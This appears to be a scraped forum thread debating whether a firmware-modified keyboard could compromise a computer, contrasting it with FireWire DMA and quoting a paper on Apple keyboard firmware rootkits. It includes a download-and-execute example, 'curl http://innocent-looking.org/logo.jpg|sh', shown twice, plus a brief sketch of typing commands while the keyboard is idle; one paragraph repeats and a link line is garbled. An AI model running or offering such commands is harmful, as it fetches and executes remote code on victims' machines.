My point was that the modified keyboard alone couldn't do it. It's not a FireWire device that can read/write things from/to memory however it pleases, insta-pwning a computer as soon as it's connected (unless something like VT-d is being used to contain DMA transfers). It's not even a USB device that could abuse some poorly written driver to gain access.
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.
Why when a shell is focused? Better to wait until the keyboard has been idle for some time, then send the keystrokes to open a shell, execute the needed commands, and close it afterward.
Here's a fun thought exercise for you, since my first reply didn't spark one. Imagine you're an evil keyboard. What evil could you accomplish? Hint: you don't even need your own radio, the computer's already got one.
"we describe how to tamper with a firmware upgrade
to the Apple Aluminum Keyboard. We describe
how an attacker can subvert an off-the-shelf keyboard by
embedding into the firmware malicious code which allows
a rootkit to survive a clean re-installation of the host
operating system."
DMA via FireWire (or Thunderbolt or similar) allows you to very quickly poke at system memory with a near-zero risk of being detected.
An autonomously malicious PS/2 keyboard, on the other hand, is on the end of a slow (~12 kbit/s) serial interface. It can only simulate keypresses and receive updates about the keyboard LEDs' statuses. It doesn't know the current state of the system. It's as likely to type "curl http://innocent-looking.org/logo.jpg|sh" in a text editor as it is at a command prompt, so it can't type anything autonomously without running the (huge) risk of alerting its owner to its presence.
Edit: The "Reversing and exploiting an Apple firmware update" paper linked below talks about persisting a rootkit on a computer by using Spotlight to open Terminal, then typing a command to download and execute a payload. That runs the same risk of alerting the user to its presence, and it will completely fail if the user has remapped Cmd-Space to something else.
![http://innocent-looking.org/logo.jpg|sh"](http://innocent-looking.org/logo.jpg|sh"){kind=link}
If a hypothetical modified keyboard is logging keystrokes, someone has to eventually retrieve it to get the logged data. If it's transmitting keystrokes via radio, someone has to be nearby to capture them and then steal the laptop to get at its (presumably encrypted) data.